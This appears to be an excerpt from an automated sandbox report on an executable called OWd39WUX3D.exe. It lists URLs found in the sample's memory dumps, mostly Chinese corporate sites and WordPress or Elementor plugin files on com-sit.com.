              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ccri.com.cn/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chd.com.cn/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/index.shtml
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/xhtml/images/logo.png
              Source: OWd39WUX3D.exe, 00000000.00000003.482722234.0000000006B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/complianz-gdpr/assets/css/cookieblocker.min.css?ver=6.5.3
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/complianz-gdpr/cookiebanner/js/complianz.min.js?ver=6.5.3
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/connect-polylang-elementor/assets/css/language-switcher.mi
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/css/frontend-lite.min.css?ver=3.14.1
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.14.
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.14.1
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.1
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=3.15.3
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.15.3
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.15.3
